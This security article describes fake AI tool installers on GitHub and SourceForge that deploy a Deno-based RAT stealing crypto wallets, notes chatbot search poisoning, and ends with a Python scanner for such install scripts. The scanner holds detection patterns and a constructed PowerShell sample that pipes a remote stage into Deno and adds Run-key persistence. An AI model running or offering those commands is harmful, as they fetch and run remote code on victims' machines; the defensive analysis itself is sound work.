
Fake AI Tool Installers on GitHub Are Hiding Deno RAT Malware


What Fake AI Installers Are and Why Developers Should Care

Fake AI installers are malicious downloads that pretend to be setup files or plugins for tools like ChatGPT or Claude, but instead install remote access malware that can hijack browsers, steal cryptocurrency wallets, and give attackers long-term control over a developer’s machine. Attackers are abusing trusted platforms such as GitHub and SourceForge to host counterfeit installers and scripts disguised as popular AI tools and audio software, then promoting them through compromised YouTube channels that have gathered more than 50,000 views. These look like normal community projects or unofficial ports, which makes them believable to developers, creators, and power users who are comfortable running scripts from open-source repositories. In reality, the installers deploy a Deno-based RAT through a backdoor called DinDoor, turning a routine “download and run this command” experience into a silent compromise aimed at crypto wallet theft and persistent remote access.


How Deno RAT Malware Sneaks In Through GitHub and SourceForge

The fake AI installers arrive as GitHub or SourceForge projects with instructions to open a terminal and paste a one-line command for Windows or macOS. That command pulls down an MSI or PowerShell script that installs Scoop and WinGet, then uses them to install the legitimate Deno runtime. Instead of shipping an obvious binary, attackers use Deno to fetch and run the DinDoor backdoor directly from a remote server, with the next stage executed in memory via standard input so no payload hits disk. DinDoor creates a registry Run key for persistence, reports system details to a command-and-control server, and downloads more components, including a Deno RAT previously tracked as Smokest. According to Malwarebytes, attackers rotate GitHub accounts and create multiple repositories per account, quickly replacing projects as they are taken down, which makes GitHub malware detection harder for users who only glance at star counts or clone stats.


What Deno RAT Can Do: From Crypto Wallet Theft to Stealth Screen Streaming

Once running, the Deno RAT gives attackers broad control of an infected system. It can execute commands and PowerShell scripts, manage files and processes, and open SOCKS5 proxy tunnels, turning the victim machine into an access point. Its stealer module focuses on crypto wallet theft, targeting more than 50 browser wallet extensions and 10 desktop wallet apps such as Atomic Wallet, Exodus, Electrum, and ByteCoin, along with data from Chrome, Brave, Edge, Opera, Vivaldi, and other Chromium-based browsers plus Telegram, Discord, and Lightcord. One feature stands out for developer security threats: to stream a live view of the victim’s screen, the RAT silently launches Microsoft Edge, connects via the Chrome DevTools Protocol, and injects a WebRTC page, sending encrypted video frames peer-to-peer through a normal browser process that blends into network traffic.

AI Chatbots, Search Poisoning, and the New Supply Chain Attack Surface

These fake AI installers are part of a wider trend where attackers abuse both trusted tooling and modern discovery channels. GitHub and SourceForge add credibility, while Scoop, WinGet, and Deno look like ordinary developer tools in logs. At the same time, Microsoft has observed attackers using AI chatbots to recommend malicious download sites impersonating utilities like CrystalDiskInfo, HWMonitor, Display Driver Uninstaller, FurMark, K-Lite Codec Pack, and PDFgear. This AI search result poisoning extends traditional SEO poisoning: users ask a chatbot for a download, receive a link to an attacker-controlled domain, then install malware that includes cryptojacking payloads and persistent ScreenConnect access for data theft or ransomware. According to Microsoft Defender Experts, these campaigns focus on high-value systems rather than mass infection, showing how supply chain attacks against development and performance tools are becoming a favored path to credentials, GPU power, and digital assets.

How Developers Can Spot and Avoid Fake AI Installers

Developers can cut the risk by treating every installer and one-line setup command with suspicion, especially for AI tools. First, verify the official download source: cross-check domains and repository links from the vendor’s main website instead of following YouTube descriptions, chatbot answers, or random blogs. Look for repository verification badges or organization accounts, and be wary of brand-new personal accounts hosting "official" ChatGPT or Claude installers. Before running scripts, open them in a text editor or IDE and scan for steps that install unexpected package managers, fetch remote scripts, or pipe content directly into interpreters like Deno, PowerShell, or bash. Avoid copy-pasting commands that pipe curl or Invoke-WebRequest output straight into a shell. For GitHub malware detection on your own systems, keep endpoint protection and browser extensions that flag suspicious domains enabled. Finally, restrict where private keys and crypto wallets are stored, and separate development and wallet usage across different profiles or machines.
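The "open the script and scan it" advice above can be turned into a quick triage check for the chain described earlier (package-manager bootstrap, Deno install, remote stage fed through stdin, Run-key persistence). The script below is an added example written for this article, not a tool from Malwarebytes or any vendor; the pattern names and the sample PowerShell snippet are constructed for illustration.

```python
import re

# Heuristic patterns for the behaviours the article describes. These are this
# example's own categories, not a vendor taxonomy, and are deliberately noisy:
# a hit means "read this line carefully", not "this is malware".
PATTERNS = {
    "remote_fetch": re.compile(
        r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget)\b", re.I),
    "pipe_to_interpreter": re.compile(
        r"\|\s*(iex|Invoke-Expression|bash|sh|zsh|powershell|pwsh|deno\s+run)\b", re.I),
    # deno run with a URL argument, or reading the program from stdin ("-")
    "remote_deno_run": re.compile(
        r"\bdeno\s+run\b[^\n]*?(https?://|\s-\s*$)", re.I),
    "pkgmgr_bootstrap": re.compile(
        r"\b(scoop|winget)\s+install\b|get\.scoop\.sh", re.I),
    "run_key_persistence": re.compile(r"CurrentVersion\\Run\b", re.I),
}

def scan_install_script(text: str) -> list[tuple[int, str, str]]:
    """Return (line_no, category, stripped_line) for every pattern hit."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for name, rx in PATTERNS.items():
            if rx.search(line):
                findings.append((no, name, line.strip()))
    return findings

def risk_summary(text: str) -> dict[str, int]:
    """Count hits per category for a quick verdict before running anything."""
    counts: dict[str, int] = {}
    for _, name, _ in scan_install_script(text):
        counts[name] = counts.get(name, 0) + 1
    return counts

# Constructed sample (not a real malware script) shaped like the setup flow
# the article describes: bootstrap Scoop/WinGet, install Deno, run a remote
# second stage via stdin, then add a Run key for persistence.
SAMPLE = r"""Invoke-RestMethod get.scoop.sh | Invoke-Expression
scoop install deno
winget install deno
irm https://example.invalid/stage2.ts | deno run -A -
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name Updater -Value "deno run -A C:\Users\Public\u.ts"
"""

if __name__ == "__main__":
    for no, name, line in scan_install_script(SAMPLE):
        print(f"line {no}: {name}: {line}")
    print(risk_summary(SAMPLE))
```

A clean script that only references the vendor's own domain and installs nothing extra should produce no hits; several categories on one short script is exactly the shape of the "download and run this command" flow the article warns about.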
